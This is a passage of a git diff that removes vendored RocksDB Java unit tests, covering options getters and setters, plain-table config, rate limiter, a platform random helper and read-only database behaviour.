-  public void adviseRandomOnOpen() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAdviseRandomOnOpen(boolValue);
-      assertThat(opt.adviseRandomOnOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbWriteBufferSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setDbWriteBufferSize(longValue);
-      assertThat(opt.dbWriteBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void accessHintOnCompactionStart() {
-    try (final Options opt = new Options()) {
-      final AccessHint accessHint = AccessHint.SEQUENTIAL;
-      opt.setAccessHintOnCompactionStart(accessHint);
-      assertThat(opt.accessHintOnCompactionStart()).isEqualTo(accessHint);
-    }
-  }
-
-  @Test
-  public void newTableReaderForCompactionInputs() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setNewTableReaderForCompactionInputs(boolValue);
-      assertThat(opt.newTableReaderForCompactionInputs()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void compactionReadaheadSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setCompactionReadaheadSize(longValue);
-      assertThat(opt.compactionReadaheadSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void randomAccessMaxBufferSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setRandomAccessMaxBufferSize(longValue);
-      assertThat(opt.randomAccessMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writableFileMaxBufferSize() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWritableFileMaxBufferSize(longValue);
-      assertThat(opt.writableFileMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useAdaptiveMutex() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseAdaptiveMutex(boolValue);
-      assertThat(opt.useAdaptiveMutex()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void bytesPerSync() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setBytesPerSync(longValue);
-      assertThat(opt.bytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walBytesPerSync() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWalBytesPerSync(longValue);
-      assertThat(opt.walBytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void enableThreadTracking() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableThreadTracking(boolValue);
-      assertThat(opt.enableThreadTracking()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void delayedWriteRate() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setDelayedWriteRate(longValue);
-      assertThat(opt.delayedWriteRate()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void allowConcurrentMemtableWrite() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowConcurrentMemtableWrite(boolValue);
-      assertThat(opt.allowConcurrentMemtableWrite()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void enableWriteThreadAdaptiveYield() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableWriteThreadAdaptiveYield(boolValue);
-      assertThat(opt.enableWriteThreadAdaptiveYield()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void writeThreadMaxYieldUsec() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadMaxYieldUsec(longValue);
-      assertThat(opt.writeThreadMaxYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writeThreadSlowYieldUsec() {
-    try (final Options opt = new Options()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadSlowYieldUsec(longValue);
-      assertThat(opt.writeThreadSlowYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void skipStatsUpdateOnDbOpen() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setSkipStatsUpdateOnDbOpen(boolValue);
-      assertThat(opt.skipStatsUpdateOnDbOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void walRecoveryMode() {
-    try (final Options opt = new Options()) {
-      for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-        opt.setWalRecoveryMode(walRecoveryMode);
-        assertThat(opt.walRecoveryMode()).isEqualTo(walRecoveryMode);
-      }
-    }
-  }
-
-  @Test
-  public void allow2pc() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllow2pc(boolValue);
-      assertThat(opt.allow2pc()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void rowCache() {
-    try (final Options opt = new Options()) {
-      assertThat(opt.rowCache()).isNull();
-
-      try(final Cache lruCache = new LRUCache(1000)) {
-        opt.setRowCache(lruCache);
-        assertThat(opt.rowCache()).isEqualTo(lruCache);
-      }
-
-      try(final Cache clockCache = new ClockCache(1000)) {
-        opt.setRowCache(clockCache);
-        assertThat(opt.rowCache()).isEqualTo(clockCache);
-      }
-    }
-  }
-
-  @Test
-  public void failIfOptionsFileError() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setFailIfOptionsFileError(boolValue);
-      assertThat(opt.failIfOptionsFileError()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dumpMallocStats() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDumpMallocStats(boolValue);
-      assertThat(opt.dumpMallocStats()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringRecovery() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringRecovery(boolValue);
-      assertThat(opt.avoidFlushDuringRecovery()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringShutdown() {
-    try (final Options opt = new Options()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringShutdown(boolValue);
-      assertThat(opt.avoidFlushDuringShutdown()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void env() {
-    try (final Options options = new Options();
-         final Env env = Env.getDefault()) {
-      options.setEnv(env);
-      assertThat(options.getEnv()).isSameAs(env);
-    }
-  }
-
-  @Test
-  public void linkageOfPrepMethods() {
-    try (final Options options = new Options()) {
-      options.optimizeUniversalStyleCompaction();
-      options.optimizeUniversalStyleCompaction(4000);
-      options.optimizeLevelStyleCompaction();
-      options.optimizeLevelStyleCompaction(3000);
-      options.optimizeForPointLookup(10);
-      options.optimizeForSmallDb();
-      options.prepareForBulkLoad();
-    }
-  }
-
-  @Test
-  public void compressionTypes() {
-    try (final Options options = new Options()) {
-      for (final CompressionType compressionType :
-          CompressionType.values()) {
-        options.setCompressionType(compressionType);
-        assertThat(options.compressionType()).
-            isEqualTo(compressionType);
-        assertThat(CompressionType.valueOf("NO_COMPRESSION")).
-            isEqualTo(CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void compressionPerLevel() {
-    try (final Options options = new Options()) {
-      assertThat(options.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList =
-          new ArrayList<>();
-      for (int i = 0; i < options.numLevels(); i++) {
-        compressionTypeList.add(CompressionType.NO_COMPRESSION);
-      }
-      options.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = options.compressionPerLevel();
-      for (final CompressionType compressionType : compressionTypeList) {
-        assertThat(compressionType).isEqualTo(
-            CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void differentCompressionsPerLevel() {
-    try (final Options options = new Options()) {
-      options.setNumLevels(3);
-
-      assertThat(options.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList = new ArrayList<>();
-
-      compressionTypeList.add(CompressionType.BZLIB2_COMPRESSION);
-      compressionTypeList.add(CompressionType.SNAPPY_COMPRESSION);
-      compressionTypeList.add(CompressionType.LZ4_COMPRESSION);
-
-      options.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = options.compressionPerLevel();
-
-      assertThat(compressionTypeList.size()).isEqualTo(3);
-      assertThat(compressionTypeList).
-          containsExactly(
-              CompressionType.BZLIB2_COMPRESSION,
-              CompressionType.SNAPPY_COMPRESSION,
-              CompressionType.LZ4_COMPRESSION);
-
-    }
-  }
-
-  @Test
-  public void bottommostCompressionType() {
-    try (final Options options = new Options()) {
-      assertThat(options.bottommostCompressionType())
-          .isEqualTo(CompressionType.DISABLE_COMPRESSION_OPTION);
-
-      for (final CompressionType compressionType : CompressionType.values()) {
-        options.setBottommostCompressionType(compressionType);
-        assertThat(options.bottommostCompressionType())
-            .isEqualTo(compressionType);
-      }
-    }
-  }
-
-  @Test
-  public void compressionOptions() {
-    try (final Options options = new Options();
-         final CompressionOptions compressionOptions = new CompressionOptions()
-             .setMaxDictBytes(123)) {
-
-      options.setCompressionOptions(compressionOptions);
-      assertThat(options.compressionOptions())
-          .isEqualTo(compressionOptions);
-      assertThat(options.compressionOptions().maxDictBytes())
-          .isEqualTo(123);
-    }
-  }
-
-  @Test
-  public void compactionStyles() {
-    try (final Options options = new Options()) {
-      for (final CompactionStyle compactionStyle :
-          CompactionStyle.values()) {
-        options.setCompactionStyle(compactionStyle);
-        assertThat(options.compactionStyle()).
-            isEqualTo(compactionStyle);
-        assertThat(CompactionStyle.valueOf("FIFO")).
-            isEqualTo(CompactionStyle.FIFO);
-      }
-    }
-  }
-
-  @Test
-  public void maxTableFilesSizeFIFO() {
-    try (final Options opt = new Options()) {
-      long longValue = rand.nextLong();
-      // Size has to be positive
-      longValue = (longValue < 0) ? -longValue : longValue;
-      longValue = (longValue == 0) ? longValue + 1 : longValue;
-      opt.setMaxTableFilesSizeFIFO(longValue);
-      assertThat(opt.maxTableFilesSizeFIFO()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void rateLimiter() {
-    try (final Options options = new Options();
-         final Options anotherOptions = new Options();
-         final RateLimiter rateLimiter =
-             new RateLimiter(1000, 100 * 1000, 1)) {
-      options.setRateLimiter(rateLimiter);
-      // Test with parameter initialization
-      anotherOptions.setRateLimiter(
-          new RateLimiter(1000));
-    }
-  }
-
-  @Test
-  public void shouldSetTestPrefixExtractor() {
-    try (final Options options = new Options()) {
-      options.useFixedLengthPrefixExtractor(100);
-      options.useFixedLengthPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void shouldSetTestCappedPrefixExtractor() {
-    try (final Options options = new Options()) {
-      options.useCappedPrefixExtractor(100);
-      options.useCappedPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void shouldTestMemTableFactoryName()
-      throws RocksDBException {
-    try (final Options options = new Options()) {
-      options.setMemTableConfig(new VectorMemTableConfig());
-      assertThat(options.memTableFactoryName()).
-          isEqualTo("VectorRepFactory");
-      options.setMemTableConfig(
-          new HashLinkedListMemTableConfig());
-      assertThat(options.memTableFactoryName()).
-          isEqualTo("HashLinkedListRepFactory");
-    }
-  }
-
-  @Test
-  public void statistics() {
-    try(final Options options = new Options()) {
-      final Statistics statistics = options.statistics();
-      assertThat(statistics).isNull();
-    }
-
-    try(final Statistics statistics = new Statistics();
-        final Options options = new Options().setStatistics(statistics);
-        final Statistics stats = options.statistics()) {
-      assertThat(stats).isNotNull();
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumberToMaintain() {
-    try (final Options options = new Options()) {
-      int intValue = rand.nextInt();
-      // Size has to be positive
-      intValue = (intValue < 0) ? -intValue : intValue;
-      intValue = (intValue == 0) ? intValue + 1 : intValue;
-      options.setMaxWriteBufferNumberToMaintain(intValue);
-      assertThat(options.maxWriteBufferNumberToMaintain()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void compactionPriorities() {
-    try (final Options options = new Options()) {
-      for (final CompactionPriority compactionPriority :
-          CompactionPriority.values()) {
-        options.setCompactionPriority(compactionPriority);
-        assertThat(options.compactionPriority()).
-            isEqualTo(compactionPriority);
-      }
-    }
-  }
-
-  @Test
-  public void reportBgIoStats() {
-    try (final Options options = new Options()) {
-      final boolean booleanValue = true;
-      options.setReportBgIoStats(booleanValue);
-      assertThat(options.reportBgIoStats()).
-          isEqualTo(booleanValue);
-    }
-  }
-
-  @Test
-  public void compactionOptionsUniversal() {
-    try (final Options options = new Options();
-         final CompactionOptionsUniversal optUni = new CompactionOptionsUniversal()
-             .setCompressionSizePercent(7)) {
-      options.setCompactionOptionsUniversal(optUni);
-      assertThat(options.compactionOptionsUniversal()).
-          isEqualTo(optUni);
-      assertThat(options.compactionOptionsUniversal().compressionSizePercent())
-          .isEqualTo(7);
-    }
-  }
-
-  @Test
-  public void compactionOptionsFIFO() {
-    try (final Options options = new Options();
-         final CompactionOptionsFIFO optFifo = new CompactionOptionsFIFO()
-             .setMaxTableFilesSize(2000)) {
-      options.setCompactionOptionsFIFO(optFifo);
-      assertThat(options.compactionOptionsFIFO()).
-          isEqualTo(optFifo);
-      assertThat(options.compactionOptionsFIFO().maxTableFilesSize())
-          .isEqualTo(2000);
-    }
-  }
-
-  @Test
-  public void forceConsistencyChecks() {
-    try (final Options options = new Options()) {
-      final boolean booleanValue = true;
-      options.setForceConsistencyChecks(booleanValue);
-      assertThat(options.forceConsistencyChecks()).
-          isEqualTo(booleanValue);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlainTableConfigTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
deleted file mode 100644
index dcb6cc3..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
+++ /dev/null
@@ -1,89 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class PlainTableConfigTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void keySize() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setKeySize(5);
-    assertThat(plainTableConfig.keySize()).
-        isEqualTo(5);
-  }
-
-  @Test
-  public void bloomBitsPerKey() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setBloomBitsPerKey(11);
-    assertThat(plainTableConfig.bloomBitsPerKey()).
-        isEqualTo(11);
-  }
-
-  @Test
-  public void hashTableRatio() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setHashTableRatio(0.95);
-    assertThat(plainTableConfig.hashTableRatio()).
-        isEqualTo(0.95);
-  }
-
-  @Test
-  public void indexSparseness() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setIndexSparseness(18);
-    assertThat(plainTableConfig.indexSparseness()).
-        isEqualTo(18);
-  }
-
-  @Test
-  public void hugePageTlbSize() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setHugePageTlbSize(1);
-    assertThat(plainTableConfig.hugePageTlbSize()).
-        isEqualTo(1);
-  }
-
-  @Test
-  public void encodingType() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setEncodingType(EncodingType.kPrefix);
-    assertThat(plainTableConfig.encodingType()).isEqualTo(
-        EncodingType.kPrefix);
-  }
-
-  @Test
-  public void fullScanMode() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setFullScanMode(true);
-    assertThat(plainTableConfig.fullScanMode()).isTrue();  }
-
-  @Test
-  public void storeIndexInFile() {
-    PlainTableConfig plainTableConfig = new PlainTableConfig();
-    plainTableConfig.setStoreIndexInFile(true);
-    assertThat(plainTableConfig.storeIndexInFile()).
-        isTrue();
-  }
-
-  @Test
-  public void plainTableConfig() {
-    try(final Options opt = new Options()) {
-      final PlainTableConfig plainTableConfig = new PlainTableConfig();
-      opt.setTableFormatConfig(plainTableConfig);
-      assertThat(opt.tableFactoryName()).isEqualTo("PlainTable");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlatformRandomHelper.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
deleted file mode 100644
index 80ea4d1..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
+++ /dev/null
@@ -1,58 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Random;
-
-/**
- * Helper class to get the appropriate Random class instance dependent
- * on the current platform architecture (32bit vs 64bit)
- */
-public class PlatformRandomHelper {
-    /**
-     * Determine if OS is 32-Bit/64-Bit
-     *
-     * @return boolean value indicating if operating system is 64 Bit.
-     */
-    public static boolean isOs64Bit(){
-      final boolean is64Bit;
-      if (System.getProperty("os.name").contains("Windows")) {
-        is64Bit = (System.getenv("ProgramFiles(x86)") != null);
-      } else {
-        is64Bit = (System.getProperty("os.arch").contains("64"));
-      }
-      return is64Bit;
-    }
-
-    /**
-     * Factory to get a platform specific Random instance
-     *
-     * @return {@link java.util.Random} instance.
-     */
-    public static Random getPlatformSpecificRandomFactory(){
-      if (isOs64Bit()) {
-        return new Random();
-      }
-      return new Random32Bit();
-    }
-
-    /**
-     * Random32Bit is a class which overrides {@code nextLong} to
-     * provide random numbers which fit in size_t. This workaround
-     * is necessary because there is no unsigned_int &lt; Java 8
-     */
-    private static class Random32Bit extends Random {
-      @Override
-      public long nextLong(){
-      return this.nextInt(Integer.MAX_VALUE);
-    }
-    }
-
-    /**
-     * Utility class constructor
-     */
-    private PlatformRandomHelper() { }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RateLimiterTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RateLimiterTest.java
deleted file mode 100644
index 27567e8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RateLimiterTest.java
+++ /dev/null
@@ -1,49 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RateLimiterTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void setBytesPerSecond() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      rateLimiter.setBytesPerSecond(2000);
-    }
-  }
-
-  @Test
-  public void getSingleBurstBytes() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      assertThat(rateLimiter.getSingleBurstBytes()).isEqualTo(100);
-    }
-  }
-
-  @Test
-  public void getTotalBytesThrough() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      assertThat(rateLimiter.getTotalBytesThrough()).isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void getTotalRequests() {
-    try(final RateLimiter rateLimiter =
-            new RateLimiter(1000, 100 * 1000, 1)) {
-      assertThat(rateLimiter.getTotalRequests()).isEqualTo(0);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOnlyTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOnlyTest.java
deleted file mode 100644
index 6b4c7b2..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOnlyTest.java
+++ /dev/null
@@ -1,305 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ReadOnlyTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void readOnlyOpen() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-      try (final RocksDB db2 = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath())) {
-        assertThat("value").
-            isEqualTo(new String(db2.get("key".getBytes())));
-      }
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = new ArrayList<>();
-      cfDescriptors.add(new ColumnFamilyDescriptor(
-          RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts));
-
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath(),
-          cfDescriptors, columnFamilyHandleList)) {
-        try (final ColumnFamilyOptions newCfOpts = new ColumnFamilyOptions();
-             final ColumnFamilyOptions newCf2Opts = new ColumnFamilyOptions()
-        ) {
-          columnFamilyHandleList.add(db.createColumnFamily(
-              new ColumnFamilyDescriptor("new_cf".getBytes(), newCfOpts)));
-          columnFamilyHandleList.add(db.createColumnFamily(
-              new ColumnFamilyDescriptor("new_cf2".getBytes(), newCf2Opts)));
-          db.put(columnFamilyHandleList.get(2), "key2".getBytes(),
-              "value2".getBytes());
-
-          final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-              new ArrayList<>();
-          try (final RocksDB db2 = RocksDB.openReadOnly(
-              dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-              readOnlyColumnFamilyHandleList)) {
-            try (final ColumnFamilyOptions newCfOpts2 =
-                     new ColumnFamilyOptions();
-                 final ColumnFamilyOptions newCf2Opts2 =
-                     new ColumnFamilyOptions()
-            ) {
-              assertThat(db2.get("key2".getBytes())).isNull();
-              assertThat(db2.get(readOnlyColumnFamilyHandleList.get(0),
-                  "key2".getBytes())).
-                  isNull();
-              cfDescriptors.clear();
-              cfDescriptors.add(
-                  new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY,
-                      newCfOpts2));
-              cfDescriptors.add(new ColumnFamilyDescriptor("new_cf2".getBytes(),
-                      newCf2Opts2));
-
-              final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList2
-                  = new ArrayList<>();
-              try (final RocksDB db3 = RocksDB.openReadOnly(
-                  dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-                  readOnlyColumnFamilyHandleList2)) {
-                try {
-                  assertThat(new String(db3.get(
-                      readOnlyColumnFamilyHandleList2.get(1),
-                      "key2".getBytes()))).isEqualTo("value2");
-                } finally {
-                  for (final ColumnFamilyHandle columnFamilyHandle :
-                      readOnlyColumnFamilyHandleList2) {
-                    columnFamilyHandle.close();
-                  }
-                }
-              }
-            } finally {
-              for (final ColumnFamilyHandle columnFamilyHandle :
-                  readOnlyColumnFamilyHandleList) {
-                columnFamilyHandle.close();
-              }
-            }
-          }
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              columnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToWriteInReadOnly() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)) {
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        //no-op
-      }
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          // test that put fails in readonly mode
-          rDb.put("key".getBytes(), "value".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToCFWriteInReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          rDb.put(readOnlyColumnFamilyHandleList.get(0),
-              "key".getBytes(), "value".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToRemoveInReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          rDb.remove("key".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToCFRemoveInReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          rDb.remove(readOnlyColumnFamilyHandleList.get(0),
-              "key".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToWriteBatchReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList);
-           final WriteBatch wb = new WriteBatch();
-           final WriteOptions wOpts = new WriteOptions()) {
-        try {
-          wb.put("key".getBytes(), "value".getBytes());
-          rDb.write(wOpts, wb);
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
